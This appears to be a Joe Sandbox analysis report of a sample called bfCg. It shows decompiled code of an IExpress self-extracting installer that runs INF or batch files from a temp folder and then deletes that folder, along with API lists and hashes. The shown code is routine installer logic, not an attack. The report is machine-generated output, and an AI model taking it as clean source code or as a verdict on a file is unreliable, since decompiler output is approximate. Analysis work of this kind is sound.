                            					_t135 = " ";
                            					_t53 =  &_v528;
                            				} else {
                            					_t135 = "\"";
                            					_t53 =  &_v527;
                            				}
                            				_t111 =  &_v1556;
                            				_v1556 = _t53;
                            				_t54 = E00941A84(_t111, _t135);
                            				_t156 = _v1556;
                            				_t151 = _t54;
                            				if(_t156 == 0) {
                            					L12:
                            					_push(_t111);
                            					E00941781( &_v268, 0x104, _t111, "C:\Users\engineer\AppData\Local\Temp\IXP001.TMP\");
                            					E0094658A( &_v268, 0x104, _t156);
                            					goto L13;
                            				} else {
                            					_t132 = _t156;
                            					_t148 =  &(_t132[1]);
                            					do {
                            						_t105 =  *_t132;
                            						_t132 =  &(_t132[1]);
                            					} while (_t105 != 0);
                            					_t111 = _t132 - _t148;
                            					if(_t111 < 3) {
                            						goto L12;
                            					}
                            					_t106 = _t156[1];
                            					if(_t106 != 0x3a || _t156[2] != 0x5c) {
                            						if( *_t156 != 0x5c || _t106 != 0x5c) {
                            							goto L12;
                            						} else {
                            							goto L11;
                            						}
                            					} else {
                            						L11:
                            						E00941680( &_v268, 0x104, _t156);
                            						L13:
                            						_t138 = 0x2e;
                            						_t57 = E009466C8(_t156, _t138);
                            						if(_t57 == 0 || CompareStringA(0x7f, 1, _t57, 0xffffffff, ".INF", 0xffffffff) != 0) {
                            							_t139 = 0x2e;
                            							_t115 = _t156;
                            							_t58 = E009466C8(_t115, _t139);
                            							if(_t58 == 0 || CompareStringA(0x7f, 1, _t58, 0xffffffff, ".BAT", 0xffffffff) != 0) {
                            								_t156 = LocalAlloc(0x40, 0x400);
                            								if(_t156 == 0) {
                            									goto L43;
                            								}
                            								_t65 = GetFileAttributesA( &_v268); // executed
                            								if(_t65 == 0xffffffff || (_t65 & 0x00000010) != 0) {
                            									E00941680( &_v1552, 0x400, _t108);
                            								} else {
                            									_push(_t115);
                            									_t108 = 0x400;
                            									E00941781( &_v1552, 0x400, _t115,  &_v268);
                            									if(_t151 != 0 &&  *_t151 != 0) {
                            										E009416B3( &_v1552, 0x400, " ");
                            										E009416B3( &_v1552, 0x400, _t151);
                            									}
                            								}
                            								_t140 = _t156;
                            								 *_t156 = 0;
                            								E00942AAC( &_v1552, _t156, _t156);
                            								goto L53;
                            							} else {
                            								_t108 = "Command.com /c %s";
                            								_t125 = "Command.com /c %s";
                            								_t145 = _t125 + 1;
                            								do {
                            									_t76 =  *_t125;
                            									_t125 = _t125 + 1;
                            								} while (_t76 != 0);
                            								_t126 = _t125 - _t145;
                            								_t146 =  &_v268;
                            								_t157 = _t146 + 1;
                            								do {
                            									_t77 =  *_t146;
                            									_t146 = _t146 + 1;
                            								} while (_t77 != 0);
                            								_t140 = _t146 - _t157;
                            								_t154 = _t126 + 8 + _t146 - _t157;
                            								_t156 = LocalAlloc(0x40, _t126 + 8 + _t146 - _t157);
                            								if(_t156 != 0) {
                            									E0094171E(_t156, _t154, "Command.com /c %s",  &_v268);
                            									goto L53;
                            								}
                            								goto L43;
                            							}
                            						} else {
                            							_t85 = GetFileAttributesA( &_v268);
                            							if(_t85 == 0xffffffff || ( !(_t85 >> 4) & 0x00000001) == 0) {
                            								_t140 = 0x525;
                            								_push(0);
                            								_push(0x10);
                            								_push(0);
                            								_t60 =  &_v268;
                            								goto L35;
                            							} else {
                            								_t140 = "[";
                            								_v1556 = _t151;
                            								_t90 = E00941A84( &_v1556, "[");
                            								if(_t90 != 0) {
                            									if( *_t90 != 0) {
                            										_v1556 = _t90;
                            									}
                            									_t140 = "]";
                            									E00941A84( &_v1556, "]");
                            								}
                            								_t156 = LocalAlloc(0x40, 0x200);
                            								if(_t156 == 0) {
                            									L43:
                            									_t60 = 0;
                            									_t140 = 0x4b5;
                            									_push(0);
                            									_push(0x10);
                            									_push(0);
                            									L35:
                            									_push(_t60);
                            									E009444B9(0, _t140);
                            									_t62 = 0;
                            									goto L54;
                            								} else {
                            									_t155 = _v1556;
                            									_t92 = _t155;
                            									if( *_t155 == 0) {
                            										_t92 = "DefaultInstall";
                            									}
                            									 *0x949120 = GetPrivateProfileIntA(_t92, "Reboot", 0,  &_v268);
                            									 *_v1560 = 1;
                            									if(GetPrivateProfileStringA("Version", "AdvancedINF", 0x941140, _t156, 8,  &_v268) == 0) {
                            										 *0x949a34 =  *0x949a34 & 0xfffffffb;
                            										if( *0x949a40 != 0) {
                            											_t108 = "setupapi.dll";
                            										} else {
                            											_t108 = "setupx.dll";
                            											GetShortPathNameA( &_v268,  &_v268, 0x104);
                            										}
                            										if( *_t155 == 0) {
                            											_t155 = "DefaultInstall";
                            										}
                            										_push( &_v268);
                            										_push(_t155);
                            										E0094171E(_t156, 0x200, "rundll32.exe %s,InstallHinfSection %s 128 %s", _t108);
                            									} else {
                            										 *0x949a34 =  *0x949a34 | 0x00000004;
                            										if( *_t155 == 0) {
                            											_t155 = "DefaultInstall";
                            										}
                            										E00941680(_t108, 0x104, _t155);
                            										_t140 = 0x200;
                            										E00941680(_t156, 0x200,  &_v268);
                            									}
                            									L53:
                            									_t62 = 1;
                            									 *_v1564 = _t156;
                            									L54:
                            									_pop(_t152);
                            									return E00946CE0(_t62, _t108, _v8 ^ _t158, _t140, _t152, _t156);
                            								}
                            							}
                            						}
                            					}
                            				}
                            			}














































                            0x00941af3
                            0x00941afa
                            0x00941b07
                            0x00941b09
                            0x00941b1a
                            0x00941b20
                            0x00941b2c
                            0x00941b3b
                            0x00941b40
                            0x00941b2e
                            0x00941b2e
                            0x00941b33
                            0x00941b33
                            0x00941b46
                            0x00941b4c
                            0x00941b52
                            0x00941b57
                            0x00941b5d
                            0x00941b61
                            0x00941b9f
                            0x00941b9f
                            0x00941bb1
                            0x00941bc2
                            0x00000000
                            0x00941b63
                            0x00941b63
                            0x00941b65
                            0x00941b68
                            0x00941b68
                            0x00941b6a
                            0x00941b6b
                            0x00941b6f
                            0x00941b74
                            0x00000000
                            0x00000000
                            0x00941b76
                            0x00941b7b
                            0x00941b86
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00941b8c
                            0x00941b8c
                            0x00941b98
                            0x00941bc7
                            0x00941bc9
                            0x00941bcc
                            0x00941bd3
                            0x00941d75
                            0x00941d76
                            0x00941d78
                            0x00941d7f
                            0x00941e05
                            0x00941e09
                            0x00000000
                            0x00000000
                            0x00941e12
                            0x00941e1b
                            0x00941e73
                            0x00941e21
                            0x00941e21
                            0x00941e28
                            0x00941e37
                            0x00941e3e
                            0x00941e52
                            0x00941e60
                            0x00941e60
                            0x00941e3e
                            0x00941e79
                            0x00941e7b
                            0x00941e84
                            0x00000000
                            0x00941d9b
                            0x00941d9b
                            0x00941da0
                            0x00941da2
                            0x00941da5
                            0x00941da5
                            0x00941da7
                            0x00941da8
                            0x00941dac
                            0x00941dae
                            0x00941db4
                            0x00941db7
                            0x00941db7
                            0x00941db9
                            0x00941dba
                            0x00941dbe
                            0x00941dc3
                            0x00941dce
                            0x00941dd2
                            0x00941deb
                            0x00000000
                            0x00941df0
                            0x00000000
                            0x00941dd2
                            0x00941bf7
                            0x00941bfe
                            0x00941c07
                            0x00941d55
                            0x00941d5a
                            0x00941d5b
                            0x00941d5d
                            0x00941d5e
                            0x00000000
                            0x00941c1b
                            0x00941c1b
                            0x00941c20
                            0x00941c2c
                            0x00941c33
                            0x00941c38
                            0x00941c3a
                            0x00941c3a
                            0x00941c40
                            0x00941c4b
                            0x00941c4b
                            0x00941c5d
                            0x00941c61
                            0x00941dd4
                            0x00941dd4
                            0x00941dd6
                            0x00941ddb
                            0x00941ddc
                            0x00941dde
                            0x00941d64
                            0x00941d64
                            0x00941d67
                            0x00941d6c
                            0x00000000
                            0x00941c67
                            0x00941c67
                            0x00941c6d
                            0x00941c72
                            0x00941c74
                            0x00941c74
                            0x00941c8e
                            0x00941c99
                            0x00941cc0
                            0x00941cf8
                            0x00941d07
                            0x00941d23
                            0x00941d09
                            0x00941d14
                            0x00941d1b
                            0x00941d1b
                            0x00941d2b
                            0x00941d2d
                            0x00941d2d
                            0x00941d38
                            0x00941d39
                            0x00941d46
                            0x00941cc2
                            0x00941cc2
                            0x00941ccc
                            0x00941cce
                            0x00941cce
                            0x00941cdb
                            0x00941ce6
                            0x00941cee
                            0x00941cee
                            0x00941e89
                            0x00941e91
                            0x00941e92
                            0x00941e94
                            0x00941e97
                            0x00941ea4
                            0x00941ea4
                            0x00941c61
                            0x00941c07
                            0x00941bd3
                            0x00941b7b

                            APIs
                            • CompareStringA.KERNEL32(0000007F,00000001,00000000,000000FF,.INF,000000FF,?,?,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,?,?,00000000,00000001,00000000), ref: 00941BE7
                            • GetFileAttributesA.KERNEL32(?,?,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,?,?,00000000,00000001,00000000), ref: 00941BFE
                            • LocalAlloc.KERNEL32(00000040,00000200,?,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,?,?,00000000,00000001,00000000), ref: 00941C57
                            • GetPrivateProfileIntA.KERNEL32 ref: 00941C88
                            • GetPrivateProfileStringA.KERNEL32(Version,AdvancedINF,00941140,00000000,00000008,?), ref: 00941CB8
                            • GetShortPathNameA.KERNEL32 ref: 00941D1B
                              • Part of subcall function 009444B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 00944518
                              • Part of subcall function 009444B9: MessageBoxA.USER32(?,?,lenta,00010010), ref: 00944554
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.315389196.0000000000941000.00000020.00000001.01000000.00000004.sdmp, Offset: 00940000, based on PE: true
                            • Associated: 00000001.00000002.315383961.0000000000940000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000001.00000002.315400088.0000000000948000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000001.00000002.315411950.000000000094A000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000001.00000002.315411950.000000000094C000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_940000_bfCg.jbxd
                            Similarity
                            • API ID: String$PrivateProfile$AllocAttributesCompareFileLoadLocalMessageNamePathShort
                            • String ID: "$.BAT$.INF$AdvancedINF$C:\Users\user\AppData\Local\Temp\IXP001.TMP\$Command.com /c %s$DefaultInstall$Reboot$Version$rundll32.exe %s,InstallHinfSection %s 128 %s$setupapi.dll$setupx.dll
                            • API String ID: 383838535-21273240
                            • Opcode ID: bd624066a592dda2765cf4babc8b20fef8b979012748b03058e41aad5016a7ae
                            • Instruction ID: 061faf0c1a4d348202ac8f88c5e4f52abf5fbc33f0acb42d0b836aad3a5f1d73
                            • Opcode Fuzzy Hash: bd624066a592dda2765cf4babc8b20fef8b979012748b03058e41aad5016a7ae
                            • Instruction Fuzzy Hash: F5A159B4E482186BEB309B24CC44FEA77ADEF96314F1402A5F595A32C1DBB09EC5CB50
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 406 942f1d-942f3d 407 942f6c-942f73 call 945164 406->407 408 942f3f-942f46 406->408 416 943041 407->416 417 942f79-942f80 call 9455a0 407->417 410 942f5f-942f66 call 943a3f 408->410 411 942f48 call 9451e5 408->411 410->407 410->416 418 942f4d-942f4f 411->418 420 943043-943053 call 946ce0 416->420 417->416 424 942f86-942fbe GetSystemDirectoryA call 94658a LoadLibraryA 417->424 418->416 421 942f55-942f5d 418->421 421->407 421->410 428 942ff7-943004 FreeLibrary 424->428 429 942fc0-942fd4 GetProcAddress 424->429 430 943006-94300c 428->430 431 943017-943024 SetCurrentDirectoryA 428->431 429->428 432 942fd6-942fee DecryptFileA 429->432 430->431 433 94300e call 94621e 430->433 434 943054-94305a 431->434 435 943026-94303c call 9444b9 call 946285 431->435 432->428 446 942ff0-942ff5 432->446 444 943013-943015 433->444 436 943065-94306c 434->436 437 94305c call 943b26 434->437 435->416 442 94307c-943089 436->442 443 94306e-943075 call 94256d 436->443 447 943061-943063 437->447 449 9430a1-9430a9 442->449 450 94308b-943091 442->450 452 94307a 443->452 444->416 444->431 446->428 447->416 447->436 455 9430b4-9430b7 449->455 456 9430ab-9430ad 449->456 450->449 453 943093 call 943ba2 450->453 452->442 460 943098-94309a 453->460 455->420 456->455 458 9430af call 944169 456->458 458->455 460->416 461 94309c 460->461 461->449
                            C-Code - Quality: 82%
                            			E00942F1D(void* __ecx, int __edx) {
                            				signed int _v8;
                            				char _v272;
                            				_Unknown_base(*)()* _v276;
                            				void* __ebx;
                            				void* __edi;
                            				void* __esi;
                            				signed int _t9;
                            				void* _t11;
                            				struct HWND__* _t12;
                            				void* _t14;
                            				int _t21;
                            				signed int _t22;
                            				signed int _t25;
                            				intOrPtr* _t26;
                            				signed int _t27;
                            				void* _t30;
                            				_Unknown_base(*)()* _t31;
                            				void* _t34;
                            				struct HINSTANCE__* _t36;
                            				intOrPtr _t41;
                            				intOrPtr* _t44;
                            				signed int _t46;
                            				int _t47;
                            				void* _t58;
                            				void* _t59;
                            
                            				_t43 = __edx;
                            				_t9 =  *0x948004; // 0xec518a5e
                            				_v8 = _t9 ^ _t46;
                            				if( *0x948a38 != 0) {
                            					L5:
                            					_t11 = E00945164(_t52);
                            					_t53 = _t11;
                            					if(_t11 == 0) {
                            						L16:
                            						_t12 = 0;
                            						L17:
                            						return E00946CE0(_t12, _t36, _v8 ^ _t46, _t43, _t44, _t45);
                            					}
                            					_t14 = E009455A0(_t53); // executed
                            					if(_t14 == 0) {
                            						goto L16;
                            					} else {
                            						_t45 = 0x105;
                            						GetSystemDirectoryA( &_v272, 0x105);
                            						_t43 = 0x105;
                            						_t40 =  &_v272;
                            						E0094658A( &_v272, 0x105, "advapi32.dll");
                            						_t36 = LoadLibraryA( &_v272);
                            						_t44 = 0;
                            						if(_t36 != 0) {
                            							_t31 = GetProcAddress(_t36, "DecryptFileA");
                            							_v276 = _t31;
                            							if(_t31 != 0) {
                            								_t45 = _t47;
                            								_t40 = _t31;
                            								 *0x94a288("C:\Users\engineer\AppData\Local\Temp\IXP001.TMP\", 0); // executed
                            								_v276();
                            								if(_t47 != _t47) {
                            									_t40 = 4;
                            									asm("int 0x29");
                            								}
                            							}
                            						}
                            						FreeLibrary(_t36);
                            						_t58 =  *0x948a24 - _t44; // 0x0
                            						if(_t58 != 0) {
                            							L14:
                            							_t21 = SetCurrentDirectoryA("C:\Users\engineer\AppData\Local\Temp\IXP001.TMP\"); // executed
                            							if(_t21 != 0) {
                            								__eflags =  *0x948a2c - _t44; // 0x0
                            								if(__eflags != 0) {
                            									L20:
                            									__eflags =  *0x948d48 & 0x000000c0;
                            									if(( *0x948d48 & 0x000000c0) == 0) {
                            										_t41 =  *0x949a40; // 0x3, executed
                            										_t26 = E0094256D(_t41); // executed
                            										_t44 = _t26;
                            									}
                            									_t22 =  *0x948a24; // 0x0
                            									 *0x949a44 = _t44;
                            									__eflags = _t22;
                            									if(_t22 != 0) {
                            										L26:
                            										__eflags =  *0x948a38;
                            										if( *0x948a38 == 0) {
                            											__eflags = _t22;
                            											if(__eflags == 0) {
                            												E00944169(__eflags);
                            											}
                            										}
                            										_t12 = 1;
                            										goto L17;
                            									} else {
                            										__eflags =  *0x949a30 - _t22; // 0x0
                            										if(__eflags != 0) {
                            											goto L26;
                            										}
                            										_t25 = E00943BA2(); // executed
                            										__eflags = _t25;
                            										if(_t25 == 0) {
                            											goto L16;
                            										}
                            										_t22 =  *0x948a24; // 0x0
                            										goto L26;
                            									}
                            								}
                            								_t27 = E00943B26(_t40, _t44);
                            								__eflags = _t27;
                            								if(_t27 == 0) {
                            									goto L16;
                            								}
                            								goto L20;
                            							}
                            							_t43 = 0x4bc;
                            							E009444B9(0, 0x4bc, _t44, _t44, 0x10, _t44);
                            							 *0x949124 = E00946285();
                            							goto L16;
                            						}
                            						_t59 =  *0x949a30 - _t44; // 0x0
                            						if(_t59 != 0) {
                            							goto L14;
                            						}
                            						_t30 = E0094621E(); // executed
                            						if(_t30 == 0) {
                            							goto L16;
                            						}
                            						goto L14;
                            					}
                            				}
                            				_t49 =  *0x948a24;
                            				if( *0x948a24 != 0) {
                            					L4:
                            					_t34 = E00943A3F(_t51);
                            					_t52 = _t34;
                            					if(_t34 == 0) {
                            						goto L16;
                            					}
                            					goto L5;
                            				}
                            				if(E009451E5(_t49) == 0) {
                            					goto L16;
                            				}
                            				_t51 =  *0x948a38;
                            				if( *0x948a38 != 0) {
                            					goto L5;
                            				}
                            				goto L4;
                            			}




























                            0x00942f1d
                            0x00942f28
                            0x00942f2f
                            0x00942f3d
                            0x00942f6c
                            0x00942f6c
                            0x00942f71
                            0x00942f73
                            0x00943041
                            0x00943041
                            0x00943043
                            0x00943053
                            0x00943053
                            0x00942f79
                            0x00942f80
                            0x00000000
                            0x00942f86
                            0x00942f86
                            0x00942f93
                            0x00942f9e
                            0x00942fa0
                            0x00942fa6
                            0x00942fb8
                            0x00942fba
                            0x00942fbe
                            0x00942fc6
                            0x00942fcc
                            0x00942fd4
                            0x00942fd6
                            0x00942fd8
                            0x00942fe0
                            0x00942fe6
                            0x00942fee
                            0x00942ff0
                            0x00942ff5
                            0x00942ff5
                            0x00942fee
                            0x00942fd4
                            0x00942ff8
                            0x00942ffe
                            0x00943004
                            0x00943017
                            0x0094301c
                            0x00943024
                            0x00943054
                            0x0094305a
                            0x00943065
                            0x00943065
                            0x0094306c
                            0x0094306e
                            0x00943075
                            0x0094307a
                            0x0094307a
                            0x0094307c
                            0x00943081
                            0x00943087
                            0x00943089
                            0x009430a1
                            0x009430a1
                            0x009430a9
                            0x009430ab
                            0x009430ad
                            0x009430af
                            0x009430af
                            0x009430ad
                            0x009430b6
                            0x00000000
                            0x0094308b
                            0x0094308b
                            0x00943091
                            0x00000000
                            0x00000000
                            0x00943093
                            0x00943098
                            0x0094309a
                            0x00000000
                            0x00000000
                            0x0094309c
                            0x00000000
                            0x0094309c
                            0x00943089
                            0x0094305c
                            0x00943061
                            0x00943063
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00943063
                            0x0094302b
                            0x00943032
                            0x0094303c
                            0x00000000
                            0x0094303c
                            0x00943006
                            0x0094300c
                            0x00000000
                            0x00000000
                            0x0094300e
                            0x00943015
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00943015
                            0x00942f80
                            0x00942f3f
                            0x00942f46
                            0x00942f5f
                            0x00942f5f
                            0x00942f64
                            0x00942f66
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00942f66
                            0x00942f4f
                            0x00000000
                            0x00000000
                            0x00942f55
                            0x00942f5d
                            0x00000000
                            0x00000000
                            0x00000000

                            APIs
                            • GetSystemDirectoryA.KERNEL32 ref: 00942F93
                            • LoadLibraryA.KERNEL32(?,advapi32.dll), ref: 00942FB2
                            • GetProcAddress.KERNEL32(00000000,DecryptFileA), ref: 00942FC6
                            • DecryptFileA.ADVAPI32 ref: 00942FE6
                            • FreeLibrary.KERNEL32(00000000), ref: 00942FF8
                            • SetCurrentDirectoryA.KERNELBASE(C:\Users\user\AppData\Local\Temp\IXP001.TMP\), ref: 0094301C
                              • Part of subcall function 009451E5: LocalAlloc.KERNEL32(00000040,00000001,00000000,?,00000002,00000000,00942F4D,?,00000002,00000000), ref: 00945201
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.315389196.0000000000941000.00000020.00000001.01000000.00000004.sdmp, Offset: 00940000, based on PE: true
                            • Associated: 00000001.00000002.315383961.0000000000940000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000001.00000002.315400088.0000000000948000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000001.00000002.315411950.000000000094A000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000001.00000002.315411950.000000000094C000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_940000_bfCg.jbxd
                            Similarity
                            • API ID: DirectoryLibrary$AddressAllocCurrentDecryptFileFreeLoadLocalProcSystem
                            • String ID: C:\Users\user\AppData\Local\Temp\IXP001.TMP\$DecryptFileA$advapi32.dll
                            • API String ID: 2126469477-1349829096
                            • Opcode ID: 1845545f847fbce5012c9fe1eb9f65fb3389590e81078c60432249efa66d39b7
                            • Instruction ID: e7851c484136d5743e6d422e19c33aca2b2c321ef04eb8632824b5ec85633052
                            • Opcode Fuzzy Hash: 1845545f847fbce5012c9fe1eb9f65fb3389590e81078c60432249efa66d39b7
                            • Instruction Fuzzy Hash: 31412834A242158BDB30AB71AC45F6B33FCEB96754F008266F951C2191EFB4CE80DB61
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Control-flow Graph

                            C-Code - Quality: 86%
                            			E00942390(CHAR* __ecx) {
                            				signed int _v8;
                            				char _v276;
                            				char _v280;
                            				char _v284;
                            				struct _WIN32_FIND_DATAA _v596;
                            				struct _WIN32_FIND_DATAA _v604;
                            				void* __ebx;
                            				void* __edi;
                            				void* __esi;
                            				signed int _t21;
                            				int _t36;
                            				void* _t46;
                            				void* _t62;
                            				void* _t63;
                            				CHAR* _t65;
                            				void* _t66;
                            				signed int _t67;
                            				signed int _t69;
                            
                            				_t69 = (_t67 & 0xfffffff8) - 0x254;
                            				_t21 =  *0x948004; // 0xec518a5e
                            				_t22 = _t21 ^ _t69;
                            				_v8 = _t21 ^ _t69;
                            				_t65 = __ecx;
                            				if(__ecx == 0 ||  *((char*)(__ecx)) == 0) {
                            					L10:
                            					_pop(_t62);
                            					_pop(_t66);
                            					_pop(_t46);
                            					return E00946CE0(_t22, _t46, _v8 ^ _t69, _t58, _t62, _t66);
                            				} else {
                            					E00941680( &_v276, 0x104, __ecx);
                            					_t58 = 0x104;
                            					E009416B3( &_v280, 0x104, "*");
                            					_t22 = FindFirstFileA( &_v284,  &_v604); // executed
                            					_t63 = _t22;
                            					if(_t63 == 0xffffffff) {
                            						goto L10;
                            					} else {
                            						goto L3;
                            					}
                            					do {
                            						L3:
                            						_t58 = 0x104;
                            						E00941680( &_v276, 0x104, _t65);
                            						if((_v604.ftCreationTime & 0x00000010) == 0) {
                            							_t58 = 0x104;
                            							E009416B3( &_v276, 0x104,  &(_v596.dwReserved1));
                            							SetFileAttributesA( &_v280, 0x80);
                            							DeleteFileA( &_v280);
                            						} else {
                            							if(lstrcmpA( &(_v596.dwReserved1), ".") != 0 && lstrcmpA( &(_v596.cFileName), "..") != 0) {
                            								E009416B3( &_v276, 0x104,  &(_v596.cFileName));
                            								_t58 = 0x104;
                            								E0094658A( &_v280, 0x104, 0x941140);
                            								E00942390( &_v284);
                            							}
                            						}
                            						_t36 = FindNextFileA(_t63,  &_v596); // executed
                            					} while (_t36 != 0);
                            					FindClose(_t63); // executed
                            					_t22 = RemoveDirectoryA(_t65); // executed
                            					goto L10;
                            				}
                            			}





















                            0x00942398
                            0x0094239e
                            0x009423a3
                            0x009423a5
                            0x009423ae
                            0x009423b3
                            0x009424cb
                            0x009424d2
                            0x009424d3
                            0x009424d4
                            0x009424df
                            0x009423c2
                            0x009423d1
                            0x009423db
                            0x009423e4
                            0x009423f6
                            0x009423fc
                            0x00942401
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00942407
                            0x00942407
                            0x00942408
                            0x00942411
                            0x0094241f
                            0x0094247a
                            0x00942483
                            0x00942495
                            0x009424a3
                            0x00942421
                            0x0094242f
                            0x00942453
                            0x0094245d
                            0x00942466
                            0x00942472
                            0x00942472
                            0x0094242f
                            0x009424af
                            0x009424b5
                            0x009424be
                            0x009424c5
                            0x00000000
                            0x009424c5

                            APIs
                            • FindFirstFileA.KERNELBASE(?,00948A3A,009411F4,00948A3A,00000000,?,?), ref: 009423F6
                            • lstrcmpA.KERNEL32(?,009411F8), ref: 00942427
                            • lstrcmpA.KERNEL32(?,009411FC), ref: 0094243B
                            • SetFileAttributesA.KERNEL32(?,00000080,?), ref: 00942495
                            • DeleteFileA.KERNEL32(?), ref: 009424A3
                            • FindNextFileA.KERNELBASE(00000000,00000010), ref: 009424AF
                            • FindClose.KERNELBASE(00000000), ref: 009424BE
                            • RemoveDirectoryA.KERNELBASE(00948A3A), ref: 009424C5
                            Memory Dump Source
                            • Source File: 00000001.00000002.315389196.0000000000941000.00000020.00000001.01000000.00000004.sdmp, Offset: 00940000, based on PE: true
                            • Associated: 00000001.00000002.315383961.0000000000940000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000001.00000002.315400088.0000000000948000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000001.00000002.315411950.000000000094A000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000001.00000002.315411950.000000000094C000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_940000_bfCg.jbxd
                            Similarity
                            • API ID: File$Find$lstrcmp$AttributesCloseDeleteDirectoryFirstNextRemove
                            • String ID:
                            • API String ID: 836429354-0
                            • Opcode ID: 31f892890656b79bf3a5abf9fc4c40549b71bd4dd758d7c1369e798955faaa8f
                            • Instruction ID: 8cfe7d62bbec1d20d22bceb866112e0372cf52d88aaf22e519ba5c43c238db83
                            • Opcode Fuzzy Hash: 31f892890656b79bf3a5abf9fc4c40549b71bd4dd758d7c1369e798955faaa8f
                            • Instruction Fuzzy Hash: 7B3193316187409BC320EBA4DD89FEB73ACFFCA305F44492DB595862A0EB34994DC752
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 70%
                            			E00942BFB(struct HINSTANCE__* _a4, intOrPtr _a12) {
                            				void* __ebx;
                            				void* __edi;
                            				void* __esi;
                            				void* __ebp;
                            				long _t4;
                            				void* _t6;
                            				intOrPtr _t7;
                            				void* _t9;
                            				struct HINSTANCE__* _t12;
                            				intOrPtr* _t17;
                            				signed char _t19;
                            				intOrPtr* _t21;
                            				void* _t22;
                            				void* _t24;
                            				intOrPtr _t32;
                            
                            				_t4 = GetVersion();
                            				if(_t4 >= 0 && _t4 >= 6) {
                            					_t12 = GetModuleHandleW(L"Kernel32.dll");
                            					if(_t12 != 0) {
                            						_t21 = GetProcAddress(_t12, "HeapSetInformation");
                            						if(_t21 != 0) {
                            							_t17 = _t21;
                            							 *0x94a288(0, 1, 0, 0);
                            							 *_t21();
                            							_t29 = _t24 - _t24;
                            							if(_t24 != _t24) {
                            								_t17 = 4;
                            								asm("int 0x29");
                            							}
                            						}
                            					}
                            				}
                            				_t20 = _a12;
                            				_t18 = _a4;
                            				 *0x949124 = 0;
                            				if(E00942CAA(_a4, _a12, _t29, _t17) != 0) {
                            					_t9 = E00942F1D(_t18, _t20); // executed
                            					_t22 = _t9; // executed
                            					E009452B6(0, _t18, _t21, _t22); // executed
                            					if(_t22 != 0) {
                            						_t32 =  *0x948a3a; // 0x0
                            						if(_t32 == 0) {
                            							_t19 =  *0x949a2c; // 0x0
                            							if((_t19 & 0x00000001) != 0) {
                            								E00941F90(_t19, _t21, _t22);
                            							}
                            						}
                            					}
                            				}
                            				_t6 =  *0x948588; // 0x0
                            				if(_t6 != 0) {
                            					CloseHandle(_t6);
                            				}
                            				_t7 =  *0x949124; // 0x0
                            				return _t7;
                            			}


















                            0x00942c03
                            0x00942c0d
                            0x00942c18
                            0x00942c20
                            0x00942c2e
                            0x00942c32
                            0x00942c36
                            0x00942c3d
                            0x00942c43
                            0x00942c45
                            0x00942c47
                            0x00942c49
                            0x00942c4e
                            0x00942c4e
                            0x00942c47
                            0x00942c32
                            0x00942c20
                            0x00942c50
                            0x00942c54
                            0x00942c57
                            0x00942c64
                            0x00942c66
                            0x00942c6b
                            0x00942c6d
                            0x00942c74
                            0x00942c76
                            0x00942c7c
                            0x00942c7e
                            0x00942c87
                            0x00942c89
                            0x00942c89
                            0x00942c87
                            0x00942c7c
                            0x00942c74
                            0x00942c8e
                            0x00942c95
                            0x00942c98
                            0x00942c98
                            0x00942c9e
                            0x00942ca7

                            APIs
                            • GetVersion.KERNEL32(?,00000002,00000000,?,00946BB0,00940000,00000000,00000002,0000000A), ref: 00942C03
                            • GetModuleHandleW.KERNEL32(Kernel32.dll,?,00946BB0,00940000,00000000,00000002,0000000A), ref: 00942C18
                            • GetProcAddress.KERNEL32(00000000,HeapSetInformation), ref: 00942C28
                            • CloseHandle.KERNEL32(00000000,?,?,00946BB0,00940000,00000000,00000002,0000000A), ref: 00942C98
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.315389196.0000000000941000.00000020.00000001.01000000.00000004.sdmp, Offset: 00940000, based on PE: true
                            • Associated: 00000001.00000002.315383961.0000000000940000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000001.00000002.315400088.0000000000948000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000001.00000002.315411950.000000000094A000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000001.00000002.315411950.000000000094C000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_940000_bfCg.jbxd
                            Similarity
                            • API ID: Handle$AddressCloseModuleProcVersion
                            • String ID: HeapSetInformation$Kernel32.dll
                            • API String ID: 62482547-3460614246
                            • Opcode ID: 7720340bb2a657642705ce4f609f20fd302fad8101946c19d9ca1cceff2116e2
                            • Instruction ID: da516091cecbb5fd910c208c97c11f5557979f7bb182e45ea1626985afe36007
                            • Opcode Fuzzy Hash: 7720340bb2a657642705ce4f609f20fd302fad8101946c19d9ca1cceff2116e2
                            • Instruction Fuzzy Hash: 371148352283159BD7206FB4ACC8F2F375DBB8A396B440095F880E3250DA70DC81D661
                            Uniqueness

